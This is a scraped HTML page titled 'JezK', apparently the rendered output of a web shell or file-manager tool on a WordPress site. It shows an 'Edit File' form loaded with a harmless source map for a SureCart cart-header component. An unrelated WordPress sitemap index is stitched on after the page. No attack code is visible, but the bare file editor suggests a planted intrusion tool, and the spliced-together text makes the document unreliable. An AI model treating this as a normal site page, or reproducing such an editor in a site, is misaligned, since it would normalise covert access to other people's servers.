
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: sc-cart-header.entry.js.map</h2><form method="post"><textarea name="file_content" rows="10" cols="50">{&quot;file&quot;:&quot;sc-cart-header.entry.js&quot;,&quot;mappings&quot;:&quot;;;;;;;;;;;;;AAAA,MAAM,eAAe,GAAG,4PAA4P,CAAC;AACrR,2BAAe,eAAe;;;;;;;;;;;;;;;;;;;;;;;0DCmCR,UAAE;;;;;;;&quot;,&quot;names&quot;:[],&quot;sources&quot;:[&quot;src/components/controllers/cart/cart-header/sc-cart-header.scss?tag=sc-cart-header&amp;encapsulation=shadow&quot;,&quot;src/components/controllers/cart/cart-header/sc-cart-header.tsx&quot;],&quot;sourcesContent&quot;:[&quot;.cart-header {\n  display: flex;\n  align-items: center;\n  justify-content: space-between;\n  width: 100%;\n  font-size: 1em;\n}\n\n.cart-title {\n  text-align: center;\n  overflow: hidden;\n  text-overflow: ellipsis;\n  white-space: nowrap;\n  padding: 0 var(--sc-spacing-small);\n}\n\n.cart__close {\n  cursor:pointer;\n}\n&quot;,&quot;import { Component, h, Event, EventEmitter } from &#039;@stencil/core&#039;;\nimport { state as checkoutState } from &#039;@store/checkout&#039;;\nimport { __ } from &#039;@wordpress/i18n&#039;;\n\n@Component({\n  tag: &#039;sc-cart-header&#039;,\n  styleUrl: &#039;sc-cart-header.scss&#039;,\n  shadow: true,\n})\nexport class ScCartHeader {\n  @Event() scCloseCart: EventEmitter&lt;void&gt;;\n\n  /** Count the number of items in the cart. */\n  getItemsCount() {\n    const items = checkoutState.checkout?.line_items?.data || [];\n    let count = 0;\n    items.forEach(item =&gt; {\n      count = count + item?.quantity;\n    });\n    return count;\n  }\n\n  render() {\n    return (\n      &lt;div class=\&quot;cart-header\&quot;&gt;\n        &lt;sc-icon\n          class=\&quot;cart__close\&quot;\n          name=\&quot;arrow-right\&quot;\n          onClick={() =&gt; this.scCloseCart.emit()}\n          onKeyDown={e =&gt; {\n            if (&#039;Enter&#039; === e?.code || &#039;Space&#039; === e?.code) {\n              this.scCloseCart.emit();\n            }\n          }}\n          tabIndex={0}\n          role=\&quot;button\&quot;\n          aria-label={__(&#039;Close Cart&#039;, &#039;surecart&#039;)}\n        &gt;&lt;/sc-icon&gt;\n        &lt;div class=\&quot;cart-title\&quot;&gt;\n          &lt;slot /&gt;\n        &lt;/div&gt;\n        &lt;sc-tag size=\&quot;small\&quot;&gt;{this?.getItemsCount?.() || 0}&lt;/sc-tag&gt;\n      &lt;/div&gt;\n    );\n  }\n}\n&quot;],&quot;version&quot;:3}</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
